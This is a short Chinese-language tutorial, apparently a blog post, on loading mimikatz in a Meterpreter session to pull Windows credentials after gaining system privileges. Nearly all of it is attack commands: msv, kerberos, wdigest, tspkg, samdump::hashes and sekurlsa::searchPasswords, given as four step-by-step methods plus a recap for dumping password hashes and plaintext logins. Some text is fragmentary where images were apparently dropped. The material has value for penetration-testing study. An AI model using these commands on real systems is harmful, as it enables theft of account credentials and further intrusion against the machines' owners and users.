meterpreter中使用mimikatz获取windows密码
进去meterpreter后getuid一下
这获得系统管理员权限
开始
加载mimikatz模块
load mimikatz
加载成功.
第一种方法:
获取登录密码的hash值
msv
上面已经是得到hash值了. 下面算明文密码.
获取明文密码
kerberoslook...拿到登录的明文密码了.
第二种方法:
使用另一种方式获取哈希值
mimikatz_command -f samdump::hashes
根据上面的方式获取明文密码
mimikatz_command -f sekurlsa::searchPasswords
第三种方法:
Wdigest命令
这个命令呢, 没有上面的复杂,加载模块后直接调用这个wdigest.
wdigest
第四种方法:
tspkg命令
tspkg
总结
一、
load mimikatz #加载mimikatz
msv #获取hash值
kerberos #获取明文
二、
load mimikatz #加载mimikatz
wdigest #获取系统账户信息
三、
load mimikatz #加载mimikatz
tspkg #获取系统账户信息
四、
load mimikatz #加载mimikatz
mimikatz_command -f samdump::hashes
mimikatz_command -f sekurlsa::searchPasswords
